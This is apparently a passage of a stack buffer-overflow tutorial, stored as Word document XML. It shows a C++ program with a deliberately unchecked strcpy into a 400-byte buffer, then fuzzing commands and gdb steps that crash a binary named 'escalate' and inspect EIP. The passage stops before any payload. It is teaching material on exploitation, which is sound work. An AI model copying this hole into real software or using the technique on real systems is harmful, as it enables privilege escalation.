        <w:t xml:space="preserve">#include &lt;iostream&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDAC3A4" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cstring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46903AFA" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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6335ED7" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vulnerable(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCA25AA" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    char </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>input[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">400];  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3513B024" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>input,tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">); //copies a malicious string into the character buffer  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F59368F" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8EF1DA" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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2E1133D" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>argc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, char* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[]) {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FABB2E0" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>argc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">= 2) { //error message if run improperly  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F9F931" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>std::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&lt; "Usage: ./prog </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>argn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">";  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D9B806" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return 1;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13759540" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    }  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EB6E47" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    vulnerable(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1]); //passes our input to the vulnerable function  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F24BD9" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return 0;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24548433" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247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47450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59604D21" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Hacking Time!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7BC919" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To review, we know:</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>1. The buffer is 400 characters long</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>2. The first command line argument we type in will be copied into that buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDEA351" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Here’s how I started poking around:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712C2F18" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67B1D5BD" wp14:editId="2C61A82D">
            <wp:extent cx="5943600" cy="7981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98195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47178F4C" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use python (or another scripting language, like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) to run in the command line. I am telling python to print a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>400 character</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> long string of “AAAAAA…” into the terminal as an argument to our vulnerable program. The syntax for doing so is this:</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>`python -c 'print "A"*400'`</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>The backticks make python evaluate whatever you input before running our program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE13FE2" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see, we get a segmentation fault at 408 characters. If you remember back to my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>speil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> earlier, we don’t want to write past the EIP, so </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> check the value of the EIP by loading this crash scenario into GDB with the following command:</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -q --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./escalate `python -c 'print "A"*408'`</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Then type </w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
